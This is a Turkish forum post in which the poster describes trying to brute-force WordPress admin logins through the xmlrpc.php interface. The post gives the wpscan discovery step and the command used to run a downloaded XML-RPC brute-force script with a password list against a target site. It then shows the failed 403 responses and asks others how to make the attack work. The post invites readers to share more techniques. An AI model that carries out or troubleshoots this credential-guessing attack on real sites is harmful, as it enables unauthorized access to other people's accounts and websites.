Neler Yeni

XML-RPC

Katılım
22 Nis 2020
Mesajlar
86
Tepkime puanı
23
Puanları
150
Merhaba arkadaşlar wordpress sitelerdeki XML-RPC açığından faydalanarak bruteforce yapmak istiyorum bu konu altında bilen arkadaşlar bilgilerini paylaşırsa bilmeyen arkadaşlarda öğrenmiş olur önce ben bildiklerimi aktariym;

1-wpscan ile tarama yaptınız ve tarama içinde aşağıdaki sonucu aldınız ve linke gittiniz.

[+] XML-RPC Interface available under: http://hedef_site.com/xmlrpc.php

linke gittiğinizde aşağıdaki sonucu alıyorsanız buraya bruteforce saldırısı yapılır biliyorum


2ag9oN.jpg


sonrasında;

github sitesinden aşağıdaki linkten bruteforce scriptini indiriyoruz


<ahref= " ">LINK - GITHUB BRUTE FORCE SCRIPT</a>

ve aşağıdaki şekilde hedef site üzerinde çalıştırdım

root@kali:~/Wordpress-XMLRPC-Brute-Force-Exploit#./wordpress-xmlrpc-brute-v1.py http://hedef_site/xmlrpc.php passwords.txt admin

ancak aşağıdaki şekilde hata alıyorum sebebi nedir _? ben mi hata yapıyorum ?



</struct></value>
<value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Geçersiz kullanıcı adı ya da parola.</string></value></member>
</struct></value>
<value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Geçersiz kullanıcı adı ya da parola.</string></value></member>
</struct></value>
</data></array>
</value>
</param>
</params>
</methodResponse>

+ -- --=[Brute force failed
 

Konuyu görüntüleyen kullanıcılar

Üst